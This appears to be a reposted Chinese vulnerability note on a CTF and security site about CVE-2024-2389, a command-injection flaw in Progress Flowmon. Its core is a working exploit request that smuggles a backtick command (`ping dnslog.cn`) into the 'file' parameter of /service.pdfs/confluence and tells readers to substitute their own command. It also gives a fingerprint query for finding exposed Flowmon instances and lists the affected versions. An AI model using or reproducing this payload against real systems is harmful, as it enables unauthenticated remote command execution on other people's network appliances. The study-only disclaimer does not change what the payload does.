CTF导航 CTF导航

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389

渗透技巧 6个月前 admin
125 0 0

漏洞名称

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


漏洞复现

1、替换需要执行的命令,发送请求

GET /service.pdfs/confluence?lang=en&file=`ping dnslog.cn` HTTP/1.1Host: 1.1.1.1

搜索指纹

title=”Flowmon Web Interface”



利用条件

11.x < Progress Flowmon < 11.1.14

12.x < Progress Flowmon < 12.3.5

Progress Flowmon 任意命令执行漏洞 CVE-2024-2389


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):Progress Flowmon 任意命令执行漏洞 CVE-2024-2389

版权声明:admin 发表于 2024年4月27日 上午8:01。
转载请注明:Progress Flowmon 任意命令执行漏洞 CVE-2024-2389 | CTF导航

相关文章

VulRepair: 基于T5的自动软件漏洞修复
admin
515
【云安全】谷歌云对象存储攻防
admin
703
CVE-2022-37958 SPNEGO 扩展协商 (NEGOEX) 安全机制RCE漏洞验证
admin
471
H5s console 视频平台未授权访问漏洞
admin
1,644
LDAP authentication in Active Directory environments
admin
161
PHP流协议的底层实现分析
admin
69

相关文章

Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
0
Open-Source Intelligence Summit 2024议题慢递
0
NTLM Relaying – Making the Old New Again
0
每日安全动态推送(24/11/4)
0
wuzhicms<=4.1.0后台RCE(0day)
0
每周蓝军技术推送(2024.10.26-11.1)
0
Apache Solr漏洞CVE-2024-45216分析
0
某小型cms漏洞复现审计
0
Distributed RPC Framework RemoteModule has Deserialization RCE in pytorch/pytorch(CVE-2024-48063)
0
JWT(JSON Web Token) 攻击面小结
0